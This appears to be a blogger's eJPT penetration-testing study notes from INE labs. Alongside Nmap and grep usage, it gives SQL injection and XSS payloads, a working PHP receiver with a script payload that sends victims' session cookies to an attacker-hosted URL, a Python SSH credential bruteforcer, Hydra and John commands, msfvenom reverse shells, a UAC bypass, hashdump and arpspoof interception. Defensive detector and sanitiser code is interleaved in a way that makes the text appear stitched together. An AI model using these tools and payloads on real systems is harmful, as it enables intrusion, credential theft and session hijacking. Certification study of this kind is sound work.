
eJPT Notes [Arijit Bhowmick][sys41x4]

eJPT Notes

Enumeration

IP check

Check your connected interfaces and IPs

Use ip addr to list the interfaces and their IP addresses

Route

Get Network/s of IP-Address to test

View the network to test using route

Only display the required Network to test

route | grep tap0 | cut -d " " -f 1

Add a network to routing table

sudo ip route add 192.168.222.0/24 via 10.175.34.1

grep Command

grep command is used to filter output text

Notations

-v ==> Invert the match: print only the lines that do not contain the given string
-r ==> Search recursively through files and folders

cut Command

cut command is used to separate words (fields) out of an output text

Notations

-d ==> delimiter [the character at which each line is split into a list of fields]
-f ==> field position(s) to select and print as output

wc Command

wc is used to count the characters, words, lines etc of a file

Basic Command

wc -m payload.php

Notations

-m ==> Counts the number of characters (-c counts bytes)
-l ==> Counts the number of lines

fping Scan

fping Host Discovery Scan

fping -a -g <network> 2>/dev/null

Notations

network ==> Network for Host Discovery
			Eg : 192.168.99.0/24
			     192.168.99.0-24

Nmap Scanning

Basic Nmap Syntax

nmap <ip-address>

Notations

-sV ==> Service/version detection scan
-sC ==> Default script scan (runs the default NSE scripts)
-sS ==> SYN scan (the default scan type when run as root)
-O ==> OS fingerprinting
-oN <File-Name> ==> Save the scan output to a file (normal format)
-sn ==> Ping scan for host discovery (no port scan)
-Pn ==> Skip the ping scan and treat every host as up
-v ==> Verbosity level 1
-vv ==> Verbosity level 2
-p ==> Port selection
-p 80 ==> Scan port 80 of the provided IP address
-p1-100 ==> Scan ports 1 to 100
-p- ==> Scan every port (1-65535)
-iL <IP-List-File> ==> Read the target IPs from the given file

Basic Nmap Commands used during INE Labs

Host Discovery Scan

sudo nmap -sn 10.100.13.0/24 -v -oN ./nmap/host_discovery.txt

sudo nmap -sn -iL network_list.txt -v -oN ./nmap/host_discovery.txt

Live Hosts Detailed Scan

sudo nmap -sC -sV -Pn -v -iL active_hosts.txt -oN ./nmap/live_hosts_detail_scan-nmap.txt

All Port Scan

sudo nmap -sC -sV -Pn -p- -v -iL active_hosts.txt -oN ./nmap/live_hosts_detail_scan-nmap.txt

Dump Active Hosts from Nmap Host Discovery Output File

cat ./nmap/host_discovery.txt | grep "Nmap scan report for" | grep -v "host down" | cut -d " " -f 5 > active_hosts.txt

Here, active_hosts.txt contains the IP-Addresses of the provided machines to test.
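The grep | cut pipeline above takes field 5, which is the address only when Nmap prints a bare IP; when reverse DNS resolves a name, the line reads "Nmap scan report for name (ip)" and field 5 becomes the hostname, which nmap -iL then has to resolve again. As an added example (not part of the original notes), the parser below builds the same active_hosts list from -oN output but handles both line forms and skips the "[host down]" lines that -v adds; the sample scan output is constructed, and live_hosts and cut_field5 are my own helpers.

```python
import re
from typing import List

# Constructed sample of `nmap -sn -v -oN` output (not real scan data): the
# -v flag makes Nmap print "[host down]" lines, and the third host has a
# reverse-DNS name, so its line has the form "name (ip)".
SAMPLE_HOST_DISCOVERY = """\
# Nmap 7.93 scan initiated Mon Jan  1 10:00:00 2024 as: nmap -sn -v -oN host_discovery.txt 10.100.13.0/29
Nmap scan report for 10.100.13.1
Host is up (0.00042s latency).
Nmap scan report for 10.100.13.2 [host down]
Nmap scan report for fileserver.lab.local (10.100.13.3)
Host is up (0.0011s latency).
Nmap scan report for 10.100.13.4 [host down]
Nmap scan report for 10.100.13.5
Host is up (0.00087s latency).
# Nmap done at Mon Jan  1 10:00:02 2024 -- 8 IP addresses (3 hosts up) scanned in 2.01 seconds
"""

# "Nmap scan report for <ip>" or "... for <name> (<ip>)", optionally
# followed by " [host down]".
REPORT_RE = re.compile(
    r"^Nmap scan report for (?P<name>\S+)"
    r"(?: \((?P<ip>\d{1,3}(?:\.\d{1,3}){3})\))?"
    r"(?P<down> \[host down\])?$"
)


def live_hosts(nmap_output: str) -> List[str]:
    """Return the IP address of every host Nmap reported as up, in scan order."""
    hosts = []
    for line in nmap_output.splitlines():
        m = REPORT_RE.match(line.strip())
        if not m or m.group("down"):
            continue
        # Prefer the parenthesised IP; fall back to the bare-address form.
        hosts.append(m.group("ip") or m.group("name"))
    return hosts


def cut_field5(nmap_output: str) -> List[str]:
    """What the grep | grep -v | cut -d " " -f 5 pipeline yields, for comparison."""
    out = []
    for line in nmap_output.splitlines():
        if "Nmap scan report for" in line and "host down" not in line:
            out.append(line.split(" ")[4])
    return out


if __name__ == "__main__":
    # Same destination as the notes: one IP per line, ready for nmap -iL.
    with open("active_hosts.txt", "w") as fh:
        fh.write("\n".join(live_hosts(SAMPLE_HOST_DISCOVERY)) + "\n")
    print("pipeline:", cut_field5(SAMPLE_HOST_DISCOVERY))
    print("parsed:  ", live_hosts(SAMPLE_HOST_DISCOVERY))
```

On the sample the pipeline returns the hostname fileserver.lab.local for the third host, while the parser returns 10.100.13.3; in a lab without DNS the two agree.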

Sample Table of Nmap data

╔══════════╦══════════════╦════════════════════════════════════════════════════════════╗
║ Protocol ║ Port Numbers ║                          Service                           ║
╠══════════╬══════════════╬════════════════════════════════════════════════════════════╣
║ TCP      ║ 22           ║ SSH                                                        ║
║ TCP      ║ 80, 443      ║ HTTP/HTTPS web server                                      ║
║ TCP      ║ 445          ║ Windows shares (SMB), also Linux equivalent -Samba service ║
║ TCP      ║ 25           ║ SMTP (Simple Mail Transfer Protocol)                       ║
║ TCP      ║ 21           ║ FTP (File Transfer Protocol)                               ║
║ TCP      ║ 137-139      ║ Windows NetBIOS services                                   ║
║ TCP      ║ 1433-1434    ║ MSSQL Database                                             ║
║ TCP      ║ 3306         ║ MySQL Database                                             ║
║ TCP      ║ 8080, 843    ║ HTTP(s) web server, HTTP Proxy                             ║
║ UDP      ║ 53           ║ DNS                                                        ║
╚══════════╩══════════════╩════════════════════════════════════════════════════════════╝

SQL Injections

Basic SQL Injection Strings

Boolean Attacks

' OR 1=1; -- -
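As an added example (not from the original notes), what that boolean string does to a login query built by string concatenation, beside the parameterised form that is the fix. The user table is constructed in memory with sqlite3 from the Python standard library; login_vulnerable and login_safe are my own functions, and the clear-text passwords exist only to keep the demonstration short.

```python
import sqlite3

# Constructed in-memory user table for the demonstration (not from the original
# notes). Passwords are stored in clear text only to keep the example short; a
# real application stores password hashes.
def make_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("bob", "hunter2")],
    )
    db.commit()
    return db


DB = make_db()

# The boolean injection string from this section.
PAYLOAD = "' OR 1=1; -- -"


def login_vulnerable(username: str, password: str) -> list:
    """Builds the query by string concatenation, so the input becomes SQL text.
    With PAYLOAD as the username the WHERE clause turns into
        username = '' OR 1=1; -- -' AND password = '...'
    and everything after -- is a comment, so every row matches."""
    sql = (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return [row[0] for row in DB.execute(sql)]


def login_safe(username: str, password: str) -> list:
    """Parameterised query: the driver passes the values separately from the
    SQL text, so quotes and comment markers in the input stay data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return [row[0] for row in DB.execute(sql, (username, password))]


if __name__ == "__main__":
    print("vulnerable:", login_vulnerable(PAYLOAD, "anything"))  # both users
    print("safe:      ", login_safe(PAYLOAD, "anything"))        # nothing
```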

sqlmap

Basic sqlmap command

Scanning URL [GET Parameter]

sqlmap -u <url-to-check>

Notations

-u ==> URL to check
-p ==> Parameter to test [e.g. id]
--technique=U ==> Use UNION-based attacks
--technique=B ==> Use boolean-based attacks
--tables ==> List the tables of the database
-D ==> Name of the database
-T ==> Name of the table to dump
--dump ==> Dump the content of the selected table/database

JSQL Injection [GUI Software]

jSQL Injection is a GUI application that can extract a database through SQL injection from a GET request (the injectable parameter being in the URL, e.g. injection.php?id=123).

Bruteforce Attacks

Bruteforce Wordlists Suggested in INE LABS

USERNAME LIST 1: /usr/share/ncrack/minimal.usr
PASSWORD LIST 1: /usr/share/seclists/Passwords/rockyou-10.txt
PASSWORD LIST 2: /usr/share/seclists/Passwords/rockyou-15.txt

Hydra

Attacking telnet service

hydra -L user_list.txt -P password_list.txt telnet://target.server

Attacking http-get service

hydra -L user_list.txt -P password_list.txt http-get://target.server

Attacking ssh service

hydra -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-15.txt ssh://192.168.99.22:22

Notations

-l ==> Single username to try
-L ==> File containing the list of usernames

-p ==> Single password to try
-P ==> File containing the list of passwords

telnet:// ==> attack the telnet service
http-get:// ==> attack a page protected by HTTP authentication, using GET requests
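Seen from the target, a Hydra run against SSH is a burst of "Failed password" lines from one source in sshd's log. As an added example (not part of the original notes), the detection below parses constructed auth.log lines, counts failures per source IP in a sliding one-minute window, and records whether a successful login followed the burst, which is the case a responder cares about most. The log lines, LINE_RE and detect_bruteforce are my own.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed auth.log excerpt (not captured from a real host). 192.168.99.50
# fails five times in four seconds and then gets in; 10.175.34.7 is an ordinary
# user who mistyped once and later logged in with a key.
SAMPLE_AUTH_LOG = """\
Jan  1 10:00:01 lab sshd[1201]: Failed password for invalid user admin from 192.168.99.50 port 50211 ssh2
Jan  1 10:00:02 lab sshd[1203]: Failed password for invalid user admin from 192.168.99.50 port 50212 ssh2
Jan  1 10:00:02 lab sshd[1205]: Failed password for root from 192.168.99.50 port 50213 ssh2
Jan  1 10:00:03 lab sshd[1207]: Failed password for root from 192.168.99.50 port 50214 ssh2
Jan  1 10:00:04 lab sshd[1209]: Failed password for invalid user test from 192.168.99.50 port 50215 ssh2
Jan  1 10:00:05 lab sshd[1211]: Accepted password for root from 192.168.99.50 port 50216 ssh2
Jan  1 10:05:00 lab sshd[1300]: Failed password for alice from 10.175.34.7 port 41000 ssh2
Jan  1 10:09:00 lab sshd[1302]: Accepted publickey for alice from 10.175.34.7 port 41002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_ts(ts: str, year: int = 2024) -> datetime:
    """syslog timestamps carry no year; assume one so they can be compared."""
    return datetime.strptime(f"{year} {' '.join(ts.split())}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(log: str, threshold: int = 5,
                      window: timedelta = timedelta(minutes=1)) -> List[Tuple[str, int, bool]]:
    """Return (source_ip, max_failures_in_window, success_after_burst) for every
    source whose failed logins inside any `window` reach `threshold`."""
    events: Dict[str, List[Tuple[datetime, str]]] = defaultdict(list)
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            events[m.group("ip")].append((parse_ts(m.group("ts")), m.group("result")))

    alerts = []
    for ip, evs in events.items():
        evs.sort()
        fails = [t for t, result in evs if result == "Failed"]
        # Sliding window over the sorted failure times.
        best, start = 0, 0
        for end in range(len(fails)):
            while fails[end] - fails[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            # A success after the last failure means the guessing probably worked.
            got_in = any(result == "Accepted" and t >= fails[-1] for t, result in evs)
            alerts.append((ip, best, got_in))
    return alerts


if __name__ == "__main__":
    for ip, count, got_in in detect_bruteforce(SAMPLE_AUTH_LOG):
        print(f"{ip}: {count} failures within one minute, success afterwards: {got_in}")
```

The threshold and window are the knobs that tools like fail2ban expose; the "success after burst" flag is what separates a noisy scan from an account that now needs its password rotated.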

Bruteforce Scripts

# Quick SSH password Checker
# Re-checks credential pairs line by line: user_list[i] is tried with pass_list[i].

import socket
import time

import paramiko
from colorama import init, Fore


init()

GREEN = Fore.GREEN
RED   = Fore.RED
RESET = Fore.RESET
BLUE  = Fore.BLUE

# Username file (one username per line)
with open("./SSH/recheck_userlist.txt", "r") as user_file:
    user_list = [line.rstrip("\n") for line in user_file]

# Password file (one password per line, same order as the usernames)
with open("./SSH/recheck_passlist.txt", "r") as pass_file:
    pass_list = [line.rstrip("\n") for line in pass_file]


# HOST
host = "192.168.99.22"


def is_ssh_open(hostname, username, password):
    # initialize SSH client
    client = paramiko.SSHClient()
    # accept the server's host key on first contact (lab setting)
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(hostname=hostname, username=username, password=password, timeout=3)
    except socket.timeout:
        # this is when host is unreachable
        print(f"{RED}[!] Host: {hostname} is unreachable, timed out.{RESET}")
        return False
    except paramiko.AuthenticationException:
        print(f"[!] Invalid credentials for {username}:{password}")
        return False
    except paramiko.SSHException:
        # the server refused the connection (rate limiting); wait a minute and retry
        print(f"{BLUE}[*] Quota exceeded, retrying with delay...{RESET}")
        time.sleep(60)
        return is_ssh_open(hostname, username, password)
    else:
        # connection was established successfully
        print(f"{GREEN}[+] Found combo: HOSTNAME: {hostname} | USERNAME: {username} | PASSWORD: {password}{RESET}")
        client.close()
        return True


try:
    # zip stops at the shorter list, so a missing password line cannot raise IndexError
    for username, password in zip(user_list, pass_list):
        is_ssh_open(host, username, password)
except KeyboardInterrupt:
    raise SystemExit

Basic Bruteforce Algorithm

# ALGORITHM [Bruteforce]
# Runnable version of the pseudocode: try every candidate of length 1, then 2, ...
# until one hashes to the attacked hash. The alphabet is kept tiny so it finishes.
import hashlib
from itertools import product

ALPHABET = "abc"
MAX_LENGTH = 4


def create_passwords_of_length(password_length):
    # every string of password_length characters drawn from ALPHABET
    for chars in product(ALPHABET, repeat=password_length):
        yield "".join(chars)


def bruteforce(attacked_hash):
    password_found = False
    password_length = 1
    while not password_found and password_length <= MAX_LENGTH:
        for password in create_passwords_of_length(password_length):
            if hashlib.sha256(password.encode()).hexdigest() == attacked_hash:
                password_found = True
                return password
        password_length = password_length + 1
    return None

Password Cracking

Hash Identification

HashID
Name-That-Hash [https://github.com/HashPals/Name-That-Hash]

John The Ripper

Basic Command

john <hash-file>

Commands Used in INE LABS

john -incremental -users:<users list> <file to crack>
john -incremental -users:victim passwd_and_shadow_hashes.john

Show Already Cracked Passwords

john --show passwd_and_shadow_hashes.john

Show Supported Formats in john

john --list=formats

Regular commands

john --wordlist=/usr/share/wordlists/rockyou.txt password_hashes.txt

john --wordlist=/usr/share/wordlists/rockyou.txt user_password_hashes.txt --format=NT

Notations

-incremental ==> Use a pure brute-force attack
                 [It requires a lot of time to crack passwords]
--wordlist ==> Wordlist File to use [Dictionary Attacks]
--format ==> Type of hash to test for
             NT ==> For Windows hashdump
--list ==> list data according to need
-users:<username> ==> user of the password to crack

Processing /etc/shadow and /etc/passwd file to john format

unshadow passwd shadow > passwd_and_shadow_hashes.john

XSS Attacks [Cross-Site Scripting Attacks]

Cookie theft via XSS only works when the session cookie is not flagged HttpOnly (the injection itself still runs; HttpOnly only keeps document.cookie from reading the cookie)

XSS Scripts

Basic XSS Payloads

</b><img src=x onerror=alert(document.domain)></img><b>
</b><script>alert(document.domain)</script><b>
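As an added example (not from the original notes), the two defences those payloads run into: HTML-encoding untrusted output so the tags above render as text, and the HttpOnly flag on the session cookie, which is the condition noted at the top of this section. html.escape is from the Python standard library; render_untrusted, is_inert and audit_set_cookie are my own helpers, and the Set-Cookie values are constructed.

```python
import html
from typing import Dict, List, Union

# The two payloads from this section, used here as test input.
PAYLOADS = [
    '</b><img src=x onerror=alert(document.domain)></img><b>',
    '</b><script>alert(document.domain)</script><b>',
]

# Constructed Set-Cookie header values (the session id is made up).
WEAK_COOKIE = "PHPSESSID=abc123; Path=/"
HARDENED_COOKIE = "PHPSESSID=abc123; Path=/; HttpOnly; Secure; SameSite=Lax"


def render_untrusted(value: str) -> str:
    """Encode untrusted text before placing it inside an HTML element body or a
    quoted attribute: < > & " ' become entities, so no new tag can start."""
    return html.escape(value, quote=True)


def is_inert(rendered: str) -> bool:
    """True when nothing that could open a tag or break out of a quoted attribute survives."""
    return not any(c in rendered for c in '<>"\'')


def audit_set_cookie(header_value: str) -> Dict[str, Union[str, bool, List[str]]]:
    """Report whether a Set-Cookie value is readable by document.cookie (no HttpOnly)
    and which of the three protective attributes are missing."""
    parts = [p.strip() for p in header_value.split(";")]
    name = parts[0].split("=", 1)[0]
    attrs = {p.split("=", 1)[0].lower() for p in parts[1:] if p}
    missing = [a for a in ("httponly", "secure", "samesite") if a not in attrs]
    return {"cookie": name, "script_readable": "httponly" not in attrs, "missing": missing}


if __name__ == "__main__":
    for p in PAYLOADS:
        print(render_untrusted(p))
    print(audit_set_cookie(WEAK_COOKIE))
    print(audit_set_cookie(HARDENED_COOKIE))
```

Output encoding has to match the context (element body, attribute, JavaScript string, URL); html.escape covers the first two, which is where both payloads above land.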

Open local File Server

Open local File server Using PHP

php -S 0.0.0.0:80

Open local File server Using Python

python3 -m http.server 80

Get Cookies As Request

Script Used in Attacker System for hosting

<?php
/*
PAYLOAD to be used (kept inside the PHP block so the comment is not sent to the browser):

<script> var i = new Image(); i.src="http://<url_where_this_script_is_placed>/get-data.php?cookie="+escape(document.cookie)</script>
*/

$ip = $_SERVER['REMOTE_ADDR'];
$browser = $_SERVER['HTTP_USER_AGENT'] ?? '';   // was $_Server, an undefined variable

$fp = fopen('gathered_info.txt', 'a');

fwrite($fp, $ip.' '.$browser." \n");
fwrite($fp, urldecode($_SERVER['QUERY_STRING'])." \n\n");
fclose($fp);
?>

Strings (cookie requests) stored in the gathered_info.txt file

192.168.99.100  
cookie=PHPSESSID=3udrbq5j2km5spea10bu7lri07 

192.168.99.11  
cookie=PHPSESSID=il99fdtjli5mq8lvm7k6r07hd0 

192.168.99.100  
cookie=PHPSESSID=il99fdtjli5mq8lvm7k6r07hd0 

192.168.99.11  
cookie=PHPSESSID=dte29r9stjinkki7hlgt3iqe54 

192.168.99.11  
cookie=PHPSESSID=vkhfn0hno94cpg84m0elb7d1d2 

Other Resources

Websites to practice XSS attacks:

[1] hack.me

Resources:

[1] The Web Application Hacker's Handbook
[2] OWASP - XSS

Null Session Attacks

Null Session Attack Tools

[1] enum4linux
[2] smbclient
[3] winfo
[4] enum
[5] NET USE

Enumeration and Exploitation Using smbclient

Share enumeration can be performed with the tools provided by the Samba suite.
smbclient is an FTP-like client for accessing Windows shares; among other things, it can enumerate the shares offered by a host.

Command Example

smbclient -L //10.130.40.80 -N

Checking for Null Sessions with Linux

We can also perform the very same checks by using smbclient:

smbclient //10.130.40.80/IPC$ -N

smbclient //10.130.40.80/C$ -N

Exploiting Null Sessions with winfo

Winfo is another command line utility we can use to automate null session exploitation. To use it, you just need to specify the target IP address and use the -n command line switch to tell the tool to use null sessions.

winfo is available on Packet Storm

Basic Command Syntax

winfo <ip-address> -n

Notation

-n ==> Null Sessions

Exploiting Null Sessions with enum

Note: it lists the administrative shares too.
enum is available on Packet Storm

enum -S <ip-address>

enum -U <ip-address>

enum -P <ip-address>

Notations

-S ==> Enumerate the shares of a machine
-U ==> Enumerate the users of a machine
-P ==> Show the password policy, which we want to know before mounting
       authentication attacks over the network

Enumerate Using nmblookup

To perform the same operations as nbtstat, we can use nmblookup with the same command line switch:

Command Syntax

nmblookup -A <target-IP-Address>

Enumerate using NET VIEW

Once an attacker knows that a machine has File Server service running, they can enumerate the shares by using the NET VIEW command

Command Syntax

NET VIEW <target-IP>

Checking Null Sessions with Windows

To connect, we have to type the following command in a Windows shell:

NET USE \\<target-IP-address>\IPC$ '' /u:''

This tells Windows to connect to the IPC$ share by using an empty password and an empty username!

Reverse Connection

Netcat

Basic Netcat Command

nc -lnvp <port>    [run on the attacker machine]

Metasploit

Generate PHP reverse shell [msfvenom]

msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.0.1 lport=4444 -o meterpreter.php

$ msfconsole 
msf5> use exploit/multi/handler
msf5 exploit(handler)> set payload windows/meterpreter/reverse_tcp
msf5 exploit(handler)> set payload php/meterpreter_reverse_tcp
msf5 exploit(handler)> set lhost 192.168.0.1
msf5 exploit(handler)> set lport 4444
msf5 exploit(handler)> exploit

Add a route through the session (autoroute) in msfconsole

meterpreter> run autoroute -s 172.16.50.0/24

Use SSH Bruteforce in msfconsole

use auxiliary/scanner/ssh/ssh_login
show options
set rhosts 172.16.50.222
set user_file /usr/share/ncrack/minimal.usr
set pass_file /usr/share/ncrack/minimal.usr
set verbose true
run

View active sessions using the sessions command
Interact with a session using sessions -i <number>
Background a shell using the meterpreter> background command

Note that on modern Windows operating systems, the User Account Control policy prevents privilege escalation via getsystem:

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect.

Bypassing UAC

You can bypass that restriction by using the bypassuac module.

meterpreter > background
[*] backgrounding session1 …

msf exploit(handler) > search bypassuac

msf exploit(handler) > use exploit/windows/local/bypassuac

# Configuring the module

msf exploit(bypassuac) > show options
msf exploit(bypassuac) > set session 1
msf exploit(bypassuac) > exploit

# Bypassing UAC

The new session has the UAC policy disabled, so the getsystem command works !

meterpreter > getuid
Server username: els\els
meterpreter > getsystem
…got system (via technique 1)

Dumping the Password Database

For example, you can dump the passwords database and save it for an offline cracking session. The hashdump module dumps the password database of a Windows machine

meterpreter > hashdump

Collection of Reverse shell [Commands]

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Interactive Shell

python/python3 Interactive Shell

Check if python/python3 is available in system

which python
which python3

python -c 'import pty;pty.spawn("/bin/bash")'

Bash Interactive Shell

bash -i

SHELL=/bin/bash script -q /dev/null

Find Commands

Find files

find / -type f -name "*flag.txt" 2>/dev/null

Find SUID Files

find / -user root -perm -4000 -print 2>/dev/null

sudo -l

ARP Spoofing

Dsniff arpspoof

Before running the tool, we have to enable Linux kernel IP forwarding, a feature that turns a Linux box into a router.

By enabling IP forwarding, you tell your machine to forward the packets you intercept to the real destination host.

Command to enable the IP forwarding feature

echo 1 > /proc/sys/net/ipv4/ip_forward

We can then run arpspoof

Command to use arpspoof

arpspoof -i <interface> -t <target> -r <host>

<interface> = tap0, eth0, etc.
<target> = victim IP
<host> = host from where the packets are sent (-r poisons both target and host, so traffic in both directions is intercepted)

To intercept traffic between 192.168.4.11 and 192.168.4.16 the commands to be used are

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 -t 192.168.4.11 -r 192.168.4.16

We can then run Wireshark to intercept the traffic
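As an added example (not part of the original notes), the same run seen from the defender's side: a list of ARP replies observed on the segment, checked for an IP claimed by more than one MAC and for a MAC answering for more than one IP, which is exactly the pattern the -r run above leaves behind. The reply list and MAC addresses are constructed; the three functions are my own and are not dsniff or arpwatch code.

```python
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

# Constructed ARP replies seen on tap0 as (sender IP, sender MAC); the MACs are
# made up. The first three are the normal state; the next two are what the
# arpspoof -t 192.168.4.11 -r 192.168.4.16 run above produces: one unknown MAC
# announcing itself as both the victim and the gateway.
ARP_REPLIES: List[Tuple[str, str]] = [
    ("192.168.4.16", "aa:bb:cc:00:00:16"),
    ("192.168.4.11", "aa:bb:cc:00:00:11"),
    ("192.168.4.16", "aa:bb:cc:00:00:16"),
    ("192.168.4.16", "de:ad:be:ef:00:01"),
    ("192.168.4.11", "de:ad:be:ef:00:01"),
    ("192.168.4.20", "aa:bb:cc:00:00:20"),
]


def ips_with_multiple_macs(replies: Iterable[Tuple[str, str]]) -> Dict[str, List[str]]:
    """IP addresses that more than one MAC has claimed (the poisoned entries)."""
    claims: Dict[str, List[str]] = defaultdict(list)
    for ip, mac in replies:
        if mac not in claims[ip]:
            claims[ip].append(mac)
    return {ip: macs for ip, macs in claims.items() if len(macs) > 1}


def macs_with_multiple_ips(replies: Iterable[Tuple[str, str]]) -> Dict[str, List[str]]:
    """MACs that answered for more than one IP; with -r the attacker's MAC does."""
    owned: Dict[str, List[str]] = defaultdict(list)
    for ip, mac in replies:
        if ip not in owned[mac]:
            owned[mac].append(ip)
    return {mac: ips for mac, ips in owned.items() if len(ips) > 1}


def gateway_impersonators(replies: Iterable[Tuple[str, str]],
                          gateway_ip: str, known_mac: str) -> List[str]:
    """MACs other than the documented one that claimed the gateway address."""
    return sorted({mac for ip, mac in replies if ip == gateway_ip and mac != known_mac})


if __name__ == "__main__":
    print("IPs with several MACs:", ips_with_multiple_macs(ARP_REPLIES))
    print("MACs with several IPs:", macs_with_multiple_ips(ARP_REPLIES))
    print("gateway impersonators:",
          gateway_impersonators(ARP_REPLIES, "192.168.4.16", "aa:bb:cc:00:00:16"))
```

The first two checks need no prior knowledge of the network; the third is the one a static ARP entry for the gateway (or Dynamic ARP Inspection on the switch) turns into a hard block rather than an alert.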

Vulnerability Scanners

[1] Nessus
[2] OpenVAS
[3] Nexpose
[4] GFI LAN Guard

Google Dorking

Useful Commands and Meaning

╔═══════════════╦═════════════════════════════════════════════════════════════════════════════════════════════════════════════╗
║    Command    ║                                                   Meaning                                                   ║
╠═══════════════╬═════════════════════════════════════════════════════════════════════════════════════════════════════════════╣
║ site:         ║ You can use this command to include only results on a given hostname                                        ║
║ intitle:      ║ This command filters according to the title of a page                                                       ║
║ inurl:        ║ Similar to intitle but works on the URL of a resource.                                                      ║
║ filetype:     ║ This filters by using the file extension of a resource. For example .pdf or .xls.                           ║
║ AND, OR, &, | ║ You can use logical operators to combine your expressions. For example site:example.com OR site:another.com ║
║ -             ║ You can use this character to filter out a keyword or a command's result from the query                     ║
╚═══════════════╩═════════════════════════════════════════════════════════════════════════════════════════════════════════════╝

Google Dorking Examples

-inurl:(htm|html|php|asp|jsp) intitle:"index of" "last modified" "parent directory" txt OR doc OR pdf

Google Dorking Database

https://www.exploit-db.com/google-hacking-database

Thank you for reading my writeup :)
I hope to see you in my next writeup.

Support Me if you want to.

This post is licensed under CC BY 4.0 by the author.